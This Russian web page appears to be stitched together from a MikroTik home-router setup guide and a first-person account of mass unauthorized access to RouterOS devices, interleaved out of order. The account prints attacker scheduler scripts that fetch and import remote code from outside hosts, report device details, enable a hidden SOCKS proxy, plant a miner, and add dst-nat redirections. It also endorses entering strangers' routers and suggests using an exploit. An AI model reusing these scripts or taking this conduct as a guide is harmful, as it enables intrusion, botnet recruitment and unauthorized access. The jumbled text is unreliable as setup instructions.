Для чего хакерам Микротик и как я спрятал 100 тыс. RouterOS от ботнета

Введение

Роутеры Mikrotik routerboard достаточно давно появились на рынке, но так до сих пор и не завоевали большую популярность. Хотя свою нишу заняли. Лично я считаю, что это отличный роутер для дома, по надежности у него нет конкурентов. Это действительно маршрутизатор, который можно один раз настроить и забыть. Лично мне еще ни разу не попадалось устройство, которое бы приходилось принудительно перезагружать, чтобы вывести его из комы, как это часто бывает с другими бюджетными железками.

Распространение среди домашних пользователей сдерживает в первую очередь сложность настройки. И хотя более ли менее продвинутому пользователю может показаться, что ничего тут сложного нет. Но на самом деле есть. И я часто сталкивался с просьбами настроить роутер дома для раздачи интернета по wifi, так как купившие по чьей-нибудь рекомендации пользователи сами не могли полностью настроить нужный функционал, хотя инструкций в интернете хватает.

Этот пробел я хочу восполнить и написать подробную пошаговую инструкцию по настройке микротика с нуля для чайников на примере самой подходящей для дома модели RB951G-2HnD. У меня давно подготовлена личная шпаргалка в виде текстового файла. По ней я буквально за 10 минут настраиваю роутер и отдаю пользователю. То есть реально ничего сложного нет, если знаешь, что делаешь. На основе этой шпаргалки я и напишу материал.

Возможно опытному пользователю нечего будет тут почерпнуть, а может быть я сам что-то делаю не совсем правильно или не оптимально. Прошу сделать подсказку или замечание в комментарии, если это действительно так. Я пишу статьи в том числе и для того, чтобы самому научиться чему-то новому. Как гласит одна восточная мудрость — чтобы получить новые знания, нужно поделиться теми, что есть у тебя с другими. Именно этим я и занимаюсь на страницах данного сайта.

Далее предлагаю краткий список того, что мы будем делать в статье, чтобы вы понимали, о чем пойдет речь.

Краткий список действий

Необходимое время: 2 часа.

Настройка роутера Mikrotik.

  • Сброс настроек роутера.
    Я предлагаю начать настраивать микротик с нуля, без заводских настроек. Это позволяет лучше понять и разобраться в принципах работы устройства.
  • Обновление прошивки.
    Рассказываю, как скачать и залить самую свежую прошивку на микротик.
  • Объединение портов в бридж.
    Так как мы разбираем базовую настройку микротика, все порты вместе с wifi будут объединены в единый сетевой бридж, чтобы подключенные к ним устройства могли взаимодействовать друг с другом.
  • Настройка ip адреса.
    В качестве примера покажу, как настроить статический ip адрес в роутере. Это не такая тривиальная и очевидная задача, как в некоторых домашних устройствах.
  • Подключение интернета.
    Показываю, что нужно сделать, чтобы заработал интернет на самом роутере.
  • Настройка dhcp сервера.
    Настраиваю dhcp сервер на микротике, чтобы он раздавал сетевые настройки для всех устройств локальной сети.
  • Настройка NAT.
    Обязательная настройка для того, чтобы интернет заработал у подключенных к mikrotik устройств.
  • Настройка Wifi.
    Показываю базовую настройку wifi в микротике. Только минимально необходимые настройки, чтобы можно было подключаться и выходить в интернет по wifi.
  • Смена пароля администратора.
    Показываю, как задать или изменить пароль доступа к роутеру.
  • Настройка времени.
    Необязательная настройка. С неправильным временем тоже все будет работать, но когда оно установлено правильно и синхронизируется, удобнее и практичнее.


  • Админы и их реакция

    По всему миру админы маршрутизаторов рано или поздно обнаруживали у себя такую пасхалку.

    /system note
    /system note print show-at-login: yes note: I closed the vulnerability with a firewall. Please update RouterOS. You can say thanks on the WebMoney Z399578297824 or BTC 14qiYkk3nUgsdqQawiMLC1bUGDZWHowix1. My Telegram https://t.me/router_os Большинство тихо закрывало дыру. Кто-то не поленились мне написать «спасибо». Но были и те, кто громко негодовал не разобравшись.

    Нормальный специалист должен адекватно реагировать когда ему указывают на его ошибку.

    За всё время мне написало не более 50 человек…
    Так как реакция пользователей была минимальна, то я пришёл к выводу, что подавляющее большинство даже и не заметит, что что-то на роутере не так. Поэтому я стал дорабатывать свой скрипт, который помимо правил фаервола будет удалять известные мне backdoors, которые оставили злоумышленники.

    Логично, что мой метод устраивает не всех. Но другого подхода для выполнения данной задачи я не придумал ещё.

    Описание Mikrotik RB951G-2HnD

    Вот он, герой сегодняшней статьи — Mikrotik RB951G-2HnD. Его описание, отзывы и стоимость можно быстро проверить на Яндекс.Маркете. По количеству отзывов уже можно сделать вывод об определенной популярности этого роутера.

    Внешний вид устройства.

    Важной особенностью этого роутера, которой лично я активно пользуюсь, является возможность запитать его с помощью специального poe адаптера.

    На изображении он справа. Берется стандартный блок питания от роутера и poe адаптер. Блок питания подключается к адаптеру, а от адаптера уже идет патч корд в первый порт routerboard. Маршрутизатор можно повесить на стену в любое место, нет необходимости привязываться к розетке. Сразу отмечу, что запитать роутер можно только poe адаптером микротика. У него другой стандарт и привычные poe свитчи 802.3af не подойдут.

    Существует похожая модель RB951Ui-2HnD. Она отличается от описываемой мной только тем, что у нее 100Mb порт, а у RB951G-2HnD 1Gb. Если для вас эти отличия не принципиальны, то можете покупать более дешевую модель. В остальном они идентичны.

    Будем потихонечку двигаться дальше. Как проще всего настроить микротик? Я для этого использую стандартную утилиту winbox. Можно пользоваться и web интерфейсом, но лично мне намного удобнее winbox. Так что для продолжения настройки скачивайте ее на компьютер.

    Подключение роутера MikroTik

    Для подключения сетевого устройства к глобальной сети Интернет нам понадобится:

  • Маршрутизатор MikroTik (для настройки используем Mikrotik RB3011UiAS-2HnD-IN). Он будет раздавать Интернет по кабелю, а также по Wi-Fi на ноутбук, смартфон, телевизор с Wi-Fi или планшет.
  • Подключение от провайдера сети Интернет (Билайн, Онлайм, МГТС, Акадо, НэтБайНэт и другие);
  • Ноутбук с WiFi-картой или компьютер с сетевой картой для подключения по RJ45;
  • Схема подключения роутера MikroTik:

  • кабель провайдера интернета подключаем в первый порт роутера;
  • компьютер подключаем к сетевому устройству сетевым кабелем в 3 порт, вы можете выбрать любой незанятый;
  • ноутбук и другие беспроводные устройства подключим по Wi-Fi;
  • блок питания включаем в разъем питания роутера MikroTik (находится на обратной стороне маршрутизатора).
  • Сброс настроек роутера

    Подключаем роутер к сети, подаем питание и запускаем на компьютере winbox. Переходим на вкладку Neighbors и ждем, когда утилита найдет наш микротик. Это может занять какое-то время. На всякий случай можно нажать Refresh, если роутер долго не обнаруживается.

    Нажимаем на мак адрес устройства, он должен будет скопироваться в поле Connect To. Пароль по-умолчанию для входа в роутеры mikrotik — пустой, а пользователь — admin. Вводим имя пользователя, поле с паролем оставляем не заполненным. Нажимаем connect. Нас встречает информационное окно, в котором приведено описание стандартных настроек.

    Здесь их можно либо оставить, либо удалить. Я всегда удаляю, так как стандартные настройки чаще всего не подходят под конкретную ситуацию. Приведу несколько примеров, почему это так:

  • Я запитал свой роутер по первому порту через poe адаптер и поэтому вынужден использовать этот порт как локальный. В настройках по-умолчанию этот порт используется как wan порт для получения интернета от провайдер.
  • В настройках по-умолчанию установлено автоматическое получение настроек от провайдера по dhcp. Если у вас другой тип подключения, то вам стандартная настройка не подходит.
  • По-умолчанию устанавливается адресное пространство 192.168.88.0/24. Мне лично не нравятся сетки по-умолчанию, так как если в них случайно воткнуть новое устройство, где будет так же забит умолчательный адрес, то в сети начнутся проблемы. Дома может это и не актуально, но в коммерческих организациях мне приходилось с этим сталкиваться. Поэтому я на всякий случай сетку всегда меняю.
  • Так что мы нажимаем Remove Configuration, чтобы удалить настройки. После этого роутер перезагрузится. Ждем примерно минуту и подключаемся к нему снова.

    Если вы по какой-то причине не удалили сразу предустановки, то выполнить сброс настроек в mikrotik на заводские можно позже. Для этого надо в терминале набрать сначала system, а затем reset. У вас спросят подтверждение и после этого routerboard перезагрузится с заводскими настройками.

    Глобальные решения

    Режим ламера

    В виду того, что устройства очень дешёвые, то их покупают пользователи, которые не имеют специальных знаний. Компании Mikrotik необходимо разработать интерфейс «ламера», который имеет минимальное количество настроек как и большинство SOHO роутеров. Причём он должен быть по умолчанию. А расширенный режим пользователь должен включить осознано сам. Текущий «Quick set» не достаточно хорош. Более того из-за изобилия кнопок юзер может и не заметить эту функцию.

    Bug analyzer

    Так же необходим модуль, который проводит анализ текущей конфигурации на возможные уязвимости и уведомляет пользователя, если считает, что роутер может быть скомпрометирован. Этот модуль должен подгружать «базу знаний», которую наполняют сотрудники Mikrotik на основании распространённых ошибок. А в случае серьёзных уязвимостей включать «аварийный» режим. Если я смог систематизировать часть угроз, то разработчики и подавно…

    FireWall — как услуга провайдеров

    Рынок «умных» устройств очень бурно развиваются и они далеко не все хорошо защищены. Большинство людей, которые их приобретают, так же не владеют специальными знаниями, чтобы самостоятельно защитить свои гаджеты.
    Поэтому интернет провайдерам пора создать коммерческую услугу по защите таких гаджетов. Банально пользователь в личном кабинете указывает какие порты открыть из интернета. Так же провайдеры могут создать централизованную базу по существующим устройствам и их нормальным потребностям. Пользователь указывает в ЛК какие устройства у него используются. В случае нестандартного поведения такого устройства — уведомлять пользователя. Я считаю, что рынок уже созрел для такой услуги.

    В этой услуге есть следующие плюсы:

  • Для провайдера ещё одна статья дохода
  • Сокращение паразитного трафика
  • Сокращаем рекрутинг устройств в ботнет
  • Популяризация развивающихся
  • Пользователи могут дальше не заморачиваться своей безопасностью.
  • Обновление прошивки

    После очистки настроек я рекомендую сразу выполнить обновление прошивки роутера Mikrotik. Для этого идем в раздел Download официального сайта и скачиваем нужный файл. В данном случае это платформа mipsbe, пакет для загрузки Main package. Загружаем его на компьютер и подключаемся к роутеру с помощью winbox. Выбираем слева раздел Files. Затем открываем рядом два окна — один с файлом прошивки, второй с winbox и перетаскиваем мышкой файл из папки в winbox в список файлов.

    Дожидаемся окончания загрузки прошивки и перезагружаем микротик через раздел меню System -> Reboot. Прошивка обновится во время загрузки роутера. Подождать придется минуты 3. Поле этого снова подключаемся к устройству. После обновления прошивки, нужно обновить загрузчик. Делается это в пункте меню System — RouterBoard. Заходите туда, проверяете строки Current Firmware и Upgrade Firmware. Если они отличаются, то жмете кнопку Upgrade. Если одинаковые, то можно ничего не делать. Изменения вступят в силу после перезагрузки.

    Проверить версию установленной прошивки можно в разделе System — Packages.

    В моем случае версия прошивки — 6.43.4. В будущем, когда на роутере будет настроен интернет, обновляться можно автоматически в этом разделе, нажимая на Check For Updates.

    Прошивку обновили, можно приступать к настройке.

    Объединение портов в бридж

    Одной из особенностей роутеров mikrotik routerboard является отсутствие предустановленных настроек портов. Объясняю на пальцах, что это такое. Покупая обычный бюджетный роутер, вы увидите подписи к портам. На одном из них обязательно будет написано WAN, на других либо ничего не будет написано, либо LAN. То есть у вас уже будет один порт настроен определенным образом для подключения интернета и остальные порты будут объединены в switch для удобства подключения оборудования.

    В Mikrotik не так. Там все порты равнозначны и WAN портом может стать абсолютно любой, какой пожелаете. Так как я 1-й порт использую для подключения питания, в качестве WAN у меня будет выступать 5-й порт. А все остальные я объединю в единую сеть с помощью bridge и добавлю к ним wifi интерфейс. Для этого идем в раздел Bridge и создаем новый bridge1.

    Настройки все оставляем дефолтные. У нас появился bridge1. Переходим на вкладку ports и жмем плюсик. Добавляем в brdige1 все порты, кроме WAN. В моем случае это 5-й порт.

    Мы объединили все необходимые интерфейсы в бридж для организации единого пространства для всех подключенных устройств.

    Настройка статического IP

    До этого мы подключались к роутеру по МАК адресу. Сейчас можно ему назначить статический локальный ip адрес, по которому он будет доступен в сети. Для этого идем в раздел IP -> Addresses и жмем плюсик.

    Указываете в разделе Address любую подсеть. Я выбрал 192.168.9.0. Соответственно микротику мы назначаем адрес 192.168.9.1/24. В качестве интерфейса выбираем bridge1. Поле Network можно не заполнять, оно заполнится автоматически. Теперь наш роутер доступен и по локальным интерфейсам, и по wifi (который еще предстоит настроить) по адресу 192.168.9.1.

    Настройка интернета в микротик

    Сейчас самое время подключиться к провайдеру и настроить интернет. Тут трудно охватить все возможные варианты подключения. Их может быть много. Я рассмотрю два самых популярных способа:

  • Вы получаете настройки от провайдера автоматически по dhcp.
  • Провайдер дал вам готовые настройки и вы их вводите вручную.
  • Как я уже писал ранее, для подключения к провайдеру мы будем использовать 5-й порт. Подключайте провод провайдера.

    Для получения настроек по dhcp переходите в winbox в раздел IP -> DHCP Client и жмите плюсик. Выбираете интерфейс ether5 и жмете ОК.

    Если вы все сделали правильно, то увидите, какой IP адрес получили. В разделе IP -> Addresses будет информация о настройках.

    Рассмотрим вариант, когда провайдер выдал все настройки и вам нужно самим их задать. Будем считать, что наши настройки интернета следующие:

    IP адрес192.168.1.104 Маска255.255.255.0 Шлюз192.168.1.1 DNS192.168.1.1

    Сначала укажем IP адрес. Делаем все то же самое, что и в предыдущем пункте при настройке статического IP. Только теперь вместо интерфейса bridge1 указываем ether5 и вводим соответствующий адрес — 192.168.1.104/24. Тут мы сразу указали и адрес и маску подсети.

    Дальше нам нужно установить шлюз по-умолчанию. Без этого обязательного шага интернет не заработает. Идем в раздел IP -> Routes и жмем плюсик для добавления шлюза по-умолчанию. В Dst. Address оставляем как есть 0.0.0.0/0, а в поле Gateway вписываем шлюз провайдера и жмем ОК.

    Уже сейчас интернет должен заработать, но без указания DNS сервера обращаться можно только по прямым ip адресам. Например можно пропинговать ip адрес серверов гугла. Открываем New Terminal и проверяем.

    Теперь установим DNS сервер. Для этого идем в IP -> DNS, в поле Servers вводим адрес dns сервера провайдера. Если у вас их два, то нажав на треугольничек, направленной вершиной вниз, вы можете ввести еще одно значение. Обязательно ставите галочку напротив Allow Remote Requests.

    Если у вас внешний IP адрес и вы разрешили удаленные DNS запросы, обязательно выполните настройку firewall и заблокируйте все входящие соединения. Если этого не сделать, то ваш роутер может стать жертвой поддельных dns запросов, которые используют для ddos атак.

    На этом все, мы полностью установили настройки интернета провайдера. Можно проверить и пропинговать привычный адрес сайта.

    На самом маршрутизаторе уже есть выход в интернет. На нам нужно его настроить для пользователей. Для этого продолжаем настройку mikrotik.

    Хакеры любят RouterOS

    В подавляющем большинстве случаев я попадал на устройство, которое уже кем-то заражено. Я, к сожалению, не сразу стал анализировать их содержимое. Вот что я нашёл и что будет верным признаком, что ваш роутер скомпрометирован.

    Web-прокси и Socks

    Самое банальное использование маршрутизатора через стандартные вэб и socks прокси. Если вы их не используете, но они включены, то просто выключите их.
    /ip proxy set enabled=no /ip socks set enabled=no Но чтобы просто так не получилось выключить хакер добавляет в шедулер скрипт, которой прокси включит через некоторое время:

    /system script

    /system scheduler add interval=10m name=»port 54321″ on-event=»port 54321″ policy= ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon start-date=sep/02/2018 start-time=20:35:53 /system script add name=»port 54321″ owner=gateway policy= ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon source=»/ ip firewall filter remove [/ip firewall filter find where comment ~ »port _[0-9]*»];/ip socks set enabled=yes port=54321 max-connections=255 conne ction-idle-timeout=60;/ip socks access remove [/ip socks access find];/ip firewall filter add chain=input protocol=tcp port=54321 action=accept comm ent=»port 54321»;/ip firewall filter move [/ip firewall filter find comm ent=»port 54321»] 1;»
    Вы можете обнаружить у себя файл webproxy/error.html который прокси вам подсовывает, а он в свою очередь вызывает майнер.
    Лишние параметры появляются и здесь:

    /ip proxy access print /ip socks access print

    Script может всё

    В 90% дырявых Микротиков имеются скрипты /system script и для них настроено расписание выполнения /system scheduler.
    По расписанию скачивается скрипт, которой в дальнейшем выполняется.

    Установка майнера

    /system scheduler add interval=11h name=upd113 on-event=»/tool fetch url=https://gotan.bit:31415/ 01/error.html mode=http dst-path=webproxy/error.html» policy= ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date= aug/20/2018 start-time=03:28:02 add interval=9h name=upd115 on-event= «/tool fetch url=https://gotan.bit:31415/01/u113.rsc mode=http» policy= ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date= aug/20/2018 start-time=03:28:02 add interval=9h name=upd116 on-event=»/import u113.rsc» policy= ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date= aug/20/2018 start-time=03:28:12 add interval=1d name=Auto113 on-event=»/system reboot» policy= ftp,reboot,read,write,policy,test,password,sniff,sensitive start-date= aug/20/2018 start-time=03:00:00 /system script add name=script4_ owner=nivel2 policy= ftp,reboot,read,write,policy,test,password,sensitive source=»/tool fetch a ddress=95.154.216.163 port=2008 src-path=/mikrotik.php mode=http keep-resu lt=no»

    Ещё один вариант скрипта, который после применения пытается частично спрятаться.

    /system scheduler add interval=11s name=MTIT on-event=»/system script run MTIT» policy= ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time= startup add interval=25m name=»DDNS Serv» on-event=»/system script run iDDNS» policy= ftp,reboot,read,write,policy,test,password,sniff,sensitive start-time= startup /system script add name=MTIT owner=admin policy= ftp,reboot,read,write,policy,test,password,sniff,sensitive source= «/ping 10.12.0.26 interface=ether4 count=10″ add name=iDDNS owner=admin policy= ftp,reboot,read,write,policy,test,password,sniff,sensitive source=»:global _mac [/interface ethernet get 1 mac-address]r n:global port ([/ip service get winbox port].»_».[/ip socks get port]. »_».[/ip proxy get port])r n:global info ([/ip socks get enabled].»_».[/ip proxy get enabled].»_ ».[/interface pptp-server server get enabled])r n:global cmd »/$mac/$port/$info/dns»r n/tool fetch address=91.134.24.238 src-path=$cmd mode=http dst-path=dns; :delay 3sr n/import dns;:delay 4s;/file remove dns»
    Таким образом у злоумышленников всегда есть возможность «скормить» новый скрипт и, например, провести масштабную DDOS атаку.
    Скрипты могут быть спрятаны везде

    Поэтому проверяйте эти места тщательно. На чистом RouterOS эти места пустые.

    DST-NAT

    К моему большому удивлению, но много таких устройств, на которых завёрнут трафик через /ip firewall nat.
    Спам в dst-nat

    /ip firewall nat add action=masquerade chain=srcnat comment=»default configuration» add action=masquerade chain=srcnat add action=dst-nat chain=dstnat dst-port=4444 protocol=tcp to-addresses= 91.92.128.187 to-ports=4444 add action=dst-nat chain=dstnat dst-port=8008 protocol=tcp to-addresses= 91.92.128.187 to-ports=4444 add action=dst-nat chain=dstnat dst-address=218.11.2.83 dst-port=8008 protocol=tcp to-addresses=91.92.128.187 to-ports=4444 add action=dst-nat chain=dstnat dst-address=218.11.2.83 dst-port=443 protocol=tcp to-addresses=91.92.128.187 to-ports=4444 add action=dst-nat chain=dstnat dst-address=218.11.2.83 dst-port=25 protocol= tcp to-addresses=91.92.128.187 to-ports=4444 add action=dst-nat chain=dstnat dst-address=51.15.39.52 dst-port=9999 protocol=tcp to-addresses=91.92.128.187 to-ports=4444 add action=dst-nat chain=dstnat dst-address=51.15.39.186 dst-port=9999 protocol=tcp to-addresses=91.92.128.187 to-ports=4444 add action=dst-nat chain=dstnat dst-address=51.15.89.69 dst-port=9999 protocol=tcp to-addresses=91.92.128.187 to-ports=4444 add action=dst-nat chain=dstnat dst-address=79.137.82.70 dst-port=9999 protocol=tcp to-addresses=91.92.128.187 to-ports=4444 add action=dst-nat chain=dstnat dst-address=79.137.82.104 dst-port=9999 protocol=tcp to-addresses=91.92.128.187 to-ports=4444 add action=dst-nat chain=dstnat dst-address=92.222.72.197 dst-port=9999 protocol=tcp to-addresses=91.92.128.187 to-ports=4444 add action=dst-nat chain=dstnat dst-address=92.222.180.118 dst-port=9999 protocol=tcp to-addresses=91.92.128.187 to-ports=4444 add action=dst-nat chain=dstnat dst-address=151.80.59.84 dst-port=9999 protocol=tcp to-addresses=91.92.128.187 to-ports=4444
    Хороший способ скрыть свой реальный ip.

    VPN

    Как же без него. RouterOS умеет подымать различные виды vpn, но хакеры чаще всего используют pptp и L2TP.
    Поэтому проверьте раздел /ppp secret

    Даже если этот раздел пуст, то ушлые хакеры могут авторизоваться и через Radius. Проверяем наличие записей /radius print Если вы ничего не настраивали, то там должно быть пусто. В противном случае стоит очистить: /radius remove numbers=[/radius find ] И запретить использовать Radius /ppp aaa set use-radius=no use-circuit-id-in-nas-port-id=no Отключаем использование Radius для авторизации на устройстве /user aaa set use-radius=no

    Если вы не используйте vpn, то отключите его /interface l2tp-server server set enabled=no /interface pptp-server server set enabled=no /interface sstp-server server set enabled=no

    DNS static

    Без фишига так же не обошлось. На роутерах в /ip dns static можно обнаружить и такое

    Всё очень просто: вы в адресную строку вбиваете адрес сайта, который вы знаете, а фактически попадаете на сервер злоумышлинника.

    Удаляем содержимое

    /ip dns static remove numbers=[/ip dns static find]

    Урезание прав админа

    UPD: Так же есть группа роутеров, где хакер урезал права у admin и завёл своего с полными правами (например router и cnt), либо просто отбирает права и обновляет прошивку на последнюю.

    содержимое /user в первом случае

    [[email protected]] > /user print Flags: X — disabled # NAME GROUP ADDRESS LAST-LOGGED-IN 0 ;;; system default user admin admin sep/18/2018 15:08:45 1 dima full sep/14/2018 19:54:00 2 router full sep/26/2018 09:23:41 [[email protected]] > /user group print 0 name=«read» policy=local,telnet,ssh,reboot,read,test,winbox,password,web,sniff,sensitive,api,romon,tikapp,!ftp,!write,!policy,!dude skin=default

    1 name=«write» policy=local,telnet,ssh,reboot,read,write,test,winbox,password,web,sniff,sensitive,api,romon,tikapp,!ftp,!policy,!dude skin=default

    2 name=«full» policy=local,telnet,ssh,ftp,reboot,read,write,policy,test,winbox,password,web,sniff,sensitive,api,romon,dude,tikapp skin=default

    3 name=«admin» policy=local,ftp,reboot,read,write,test,winbox,password,web,sniff,sensitive,api,!telnet,!ssh,!policy,!romon,!dude,!tikapp skin=default

    Как вариант решения этой проблемы: через netinstall сделать downgrade на уязвимую прошивку и воспользоваться эксплоитом.

    Packet Sniffer

    Коллеги из Лаборатории Касперского упомянули кражу трафика по средствам его перенаправления на неизвестный узел.
    Выключить его можно так: /tool sniffer stop /tool sniffer set streaming-enabled=no filter-ip-protocol=»» filter-port=»» filter-interface=»» filter-stream=no

    Настройка dhcp сервера

    Для того, чтобы подключенные устройства могли получать сетевые настройки автоматически с роутера, на нем необходимо настроить DHCP сервер. Делается это не сложно, я сейчас по шагам все распишу. Идем в IP -> DHCP, переходим на вкладку DHCP и нажимаем DHCP Setup. Нам предлагают выбрать интерфейс, на котором будет работать сервер. Выбираем bridge1.

    Жмем next. Теперь нужно выбрать адресное пространство, из которого будут выдаваться ip адреса. По-умолчанию указана подсеть, в которую входит ip адрес роутера. На это подходит, оставляем значение по-умолчанию 192.168.9.0/24.

    Дальше нужно указать адрес шлюза, который будут получать клиенты. Так как для них шлюзом будет выступать сам микротик, оставляем его адрес, который уже предложен.

    Теперь нужно указать диапазон адресов, которые будут выдаваться клиентам. Если вам не принципиально и вы не знаете, зачем его нужно менять, то оставляйте как есть. Будут использованы все свободные адреса подсети.

    На последнем этапе вводим адрес dns сервера, который будет выдаваться клиентам. Это может быть как сам микротик, так и dns сервер провайдера. Это не принципиально, но лучше указать сам роутер. Так что пишем туда локальный адрес 192.168.9.1.

    Следующий параметр оставляем по-умолчанию и жмем Next. На этом настройка dhcp сервера для локальной сети закончена.

    Если мы сейчас проводом подключим любого клиента к mikrotik, то он получит сетевые настройки, но в интернет выйти не сможет. Не хватает еще одной важной настройки — NAT.

    Подключение маршрутизатора и основные способы его настройки

    Подключение маршрутизаторов Mikrotik к устройству, с которого будет производиться настройка, осуществляется стандартно. Кабель от провайдера следует подключить к первому порту маршрутизатора, а через какой-либо из остальных портов соединить его с компьютером или ноутбуком. Настройку можно осуществлять и через Wi-Fi. Точка доступа активируется одновременно с включением устройства и полностью открыта. Само собой разумеется, что компьютер должен находиться в одном адресном пространстве с роутером или иметь сетевые настройки, предусматривающие автоматическое получение IP-адреса и адреса DNS-сервера.

    Проделав эти нехитрые манипуляции, необходимо сделать следующее:

  • Запустить браузер и в его адресной строке ввести 192.168.88.1
  • В открывшемся окне выбрать способ настройки роутера, щелкнув по нужной иконке мышкой.

  • Последний пункт требует более детальных пояснений. Как видно из скриншота, роутер Микротик можно настроить тремя способами:

    • Winbox — специальная утилита для настройки устройств Mikrotik. За иконкой скрывается ссылка на ее скачивание. Данную утилиту можно скачать и с сайта производителя;
    • Webfig — настойка роутера в браузере. Данная возможность появилась сравнительно недавно. Веб-интерфейс Webfig очень похож на Winbox, но разработчики уверяют, что его возможности шире;
    • Telnet — настройка через командную строку. Такой способ подходит для продвинутых юзеров и более подробно в статье рассматриваться не будет.

    В настоящее время разработчики делают основной упор на интерфейс Webfig, предлагающийся пользователю по умолчанию. Поэтому в более поздних версиях RouterOS стартовое окно может выглядеть вот так:

    А так как в заводских настройках для входа в веб-интерфейс роутера пароля нет, то при первом подключении пользователь может быть сразу перенаправлен на страницу настроек Webfig. Однако большинство специалистов до сих пор продолжают работать с Winbox и считают ее самым удобным способом настройки устройств Микротик. Поэтому все дальнейшие примеры будут основаны на интерфейсе данной утилиты.

    Настройка NAT

    NAT это преобразование, или как еще говорят трансляция сетевых адресов. Я не буду рассказывать, что это такое, можно самим почитать в интернете. Все современные роутеры имеют функцию NAT для обеспечения доступа к интернету абонентов. Так что мы тоже настроим NAT в mikrotik.

    Идем в раздел IP -> Firewall, открываем вкладку NAT и жмем плюсик. На вкладке General указываем только один параметр Out. Interface — ether5 (интерфейс подключения к провайдеру), все остальное не трогаем.

    Переходим на вкладку Action, выбираем в выпадающем списке masquerade. Остальное не трогаем и жмем ОК.

    Все, NAT настроили. Теперь если подключить клиента проводом в один из портов, то он получит сетевые настройки по DHCP и будет иметь доступ к интернету. Нам осталось самая малость — настроить wifi для подключения беспроводных клиентов.

    Настройка wifi точки доступа в mikrotik

    Наш роутер почти готов к работе. Осталось только настроить wi fi точку доступа и можно про него забывать :). Настройка wifi в микротике заслуживает отдельной статьи. Там очень много нюансов и возможностей. Мы сейчас сделаем самую простую настройку, которая подойдет и полностью удовлетворит потребности домашнего wifi роутера. А для более глубоких познаний можно будет воспользоваться отдельным материалом на эту тему.

    Первым делом активируем беспроводной интерфейс. По-умолчанию он выключен. Идем в раздел Wireless, выбираем wlan1 и жмем синюю галочку.

    Интерфейс из серого станет светлым. Переходим на вкладку Security profiles, два раза жмем мышкой на строчку с профилем default. В поле Mode выбираем dynamic keys. Ставим галочки напротив WPA PSK и WPA2 PSK и aes ccm. В поля WPA Pre-Shared Key и WPA2 Pre-Shares Key вводим пароль от будущей беспроводной сети. Я рекомендую использовать длинный пароль (не меньше 12-ти символов) с цифрами и спецсимволами. Да, вводить не очень удобно, но после того, как я сам без проблем брутил хэши простых паролей, я убедился, что лучше поставить сложный пароль, если не хочешь, чтобы к твоему wifi кто-то подключался.

    Сохраняем настройки. Возвращаемся на вкладку Interfaces и два раза жмем на wlan1, открываются настройки wifi интерфейса микротика. Переходим на вкладку Wireless. Выставляем настройки как у меня на скриншоте.

    Обращаю внимание на следующие настройки:

    • SSID — имя вашей беспроводной сети. Пишите то, что хочется.
    • Frequency — частота, соответствующая одному из 12-ти каналов. Самое первое значение это первый канал и так далее. Тут рекомендуется выбрать тот канал, который в вашем конкретном случае менее всего занят другими точками доступа. Если вы не знаете что это за каналы и как их проверить, то не обращайте внимания, может выбрать любое значение из списка.

    Сохраняете настройки, нажимая ОК. Все, wifi точка доступа на mikrotik настроена, можно проверять. Запускаете любое устройство, ищете вашу сеть, вводите пароль доступа и проверяете интернет. Все должно работать.

    На этом основная настройка микротика закончена, но я рекомендую выполнить еще несколько настроек для удобства и безопасности.

    Немного о себе

    Попытаюсь ответить на вопросы, которые наверняка мне зададут.

  • Я работаю на должности не связанной с Mikrotik и сетями в общем.
  • Тем не менее у меня есть сертификат MTCNA.
  • Микротик — моё хобби. Всё, что я делаю — мне просто нравится. Так сказать «по фану».
  • Почему не устроился на работу по профилю? Те кто в нашем городе покупает mikrotik много платить ЗП не могут. Те, кто может мне платить достойную ЗП — покупают cisco.
  • В комментах в фаерволе я указывал свои кошельки, но с мая мне закинули всего около $40. В телеграм писали из разных стран, мол у них нет wmz, но всё равно «спасибо».
  • Смена пароля администратора по-умолчанию

    Как я уже писал ранее, пароль администратора по-умолчанию в mikrotik не задан, он пустой. Имя пользователя — admin. Давайте установим свой пароль для ограничения доступа посторонних к настройкам. Для этого идем в раздел System -> Users. Выбираем единственного пользователя admin, жмем правой кнопкой мыши и выбираем самый последний пункт password.

    В открывшемся окошке 2 раза вводим свой пароль и сохраняем его. Теперь, чтобы подключиться через winbox нужно будет указать не только пользователя admin, но и установленный пароль.

    В свете последних взломов микротика, я настоятельно рекомендую не просто установить сложный пароль на административную учетную запись, а создать полностью новую, с именем пользователя отличным от admin. Для этого в списке пользователей, жмите плюсик и создавайте нового пользователя.

    После этого, пользователя admin можно отключить.

    Настройка сетевой карты компьютера

    Для упрощения настройки роутера MikroTik, сконфигурируем сетевую карту компьютера на получение автоматических настроек сети. Для этого в системе Windows 10 внизу слева в поисковой строке вобьем Центр управления сетями и общим доступом:

    Выберем слева “Изменение параметров адаптера”:

    Нажимаем правой кнопкой мыши на Ethernet0 (в вашем случаем подключение может именоваться по-другому) и выбираем “Свойства”

    Нажимаем на IP версии 4 (TCP/IPv4) и кнопку “Свойства”. Выбираем «Получить IP-адрес автоматически» и нажимаете кнопку «OK».

    Если сетевая карта не получает автоматически IP адрес из подсети 192.168.88.x, попробуйте его указать вручную (например: 192.168.88.2) или сбросить роутер Mikrotik к заводским настройкам.

    Настройка времени

    Я рекомендую устанавливать правильное время и включать его автоматическую синхронизацию. Это может пригодиться, если вам понадобится посмотреть какие-нибудь логи и сопоставить время. Если оно не будет установлено, то это трудно сделать. Так что настроим его. Идем в System -> Clock, устанавливаем вручную время, дату и часовой пояс.

    Сделаем так, чтобы время автоматически обновлялось через интернет. Идем в раздел System -> SNTP Client. Ставим галочку Enabled, в поле с адресами серверов вводим 193.171.23.163 и 85.114.26.194. Жмем Apply и наблюдаем результат синхронизации.

    Теперь часы роутера всегда будут иметь актуальное время.

    На этом базовая настройка роутера mikrotik для домашнего пользования закончена. Можно устанавливать его на место и пользоваться. На всякий случай рекомендую посмотреть статью с разбором основных ошибок в микротике.

    Локальная сеть

    Для настройки локальной сети роутеров MikroTik необходимо выполнить установку портов в режиме свитча.

    Для чего выполняются следующие операции:

    • открыть «WinBox»;
    • перейти в раздел «InterfaceList» и открыть параметры «ether3»;
    • в списке «Master Port» необходимо выбрать «ether2-master-local»;
    • нажать «ОК».

    Ту же операцию необходимо выполнить и для портов ether4 и ether5. В итоге напротив трёх портов должна стоять буква S.

    Добавление Wi-Fi интерфейсов в локальную сеть

